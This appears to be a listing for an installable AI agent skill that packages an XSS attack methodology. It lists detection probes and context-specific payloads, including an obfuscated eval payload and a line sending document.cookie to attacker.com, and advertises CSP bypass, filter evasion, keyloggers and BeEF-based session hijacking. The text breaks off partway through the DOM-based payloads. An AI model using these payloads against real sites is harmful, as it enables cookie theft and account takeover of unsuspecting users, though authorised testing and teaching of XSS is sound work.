xsslisted

Cross-Site Scripting expert methodology covering reflected, stored, DOM-based, and mutation XSS. Includes CSP bypass, filter evasion, and post-exploitation (session hijacking, keyloggers, BeEF integration).
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63

Install: claude install-skill sunilgentyala/OmniRed

# Cross-Site Scripting (XSS) ## Attack Surface Reflected: URL parameters, search fields, error messages, redirect parameters. Stored: comments, profiles, names, addresses, any user-controlled content persisted and rendered to others. DOM-based: JavaScript that reads from location.hash, document.referrer, location.search, postMessage without sanitisation. ## Methodology ### Phase 1 — Detection ```html <script>alert(1)</script> "><script>alert(1)</script> '><script>alert(1)</script> javascript:alert(1) <img src=x onerror=alert(1)> <svg onload=alert(1)> {{7*7}} -- template injection test alongside XSS ``` Track where your test string appears in the response. Identify the context: - HTML body (tag injection) - HTML attribute (attribute injection) - JavaScript string (JS injection) - JavaScript in `href`/`src` (URL context) ### Phase 2 — Context-specific payloads **HTML body:** ```html <script>alert(document.cookie)</script> <img src=x onerror=fetch('//attacker.com/?c='+document.cookie)> <svg/onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))> ``` **HTML attribute:** ```html " onmouseover="alert(1) " onfocus="alert(1)" autofocus=" "><img src=x onerror=alert(1)> ``` **JavaScript string context:** ```javascript '-alert(1)-' \'-alert(1)// `;alert(1)// ``` **href/src URL context:** ``` javascript:alert(1) data:text/html,<script>alert(1)</script> ``` **DOM-based (source: location.hash):** ``` http://target/#"><img src=x onerror=alert(1)> http://target/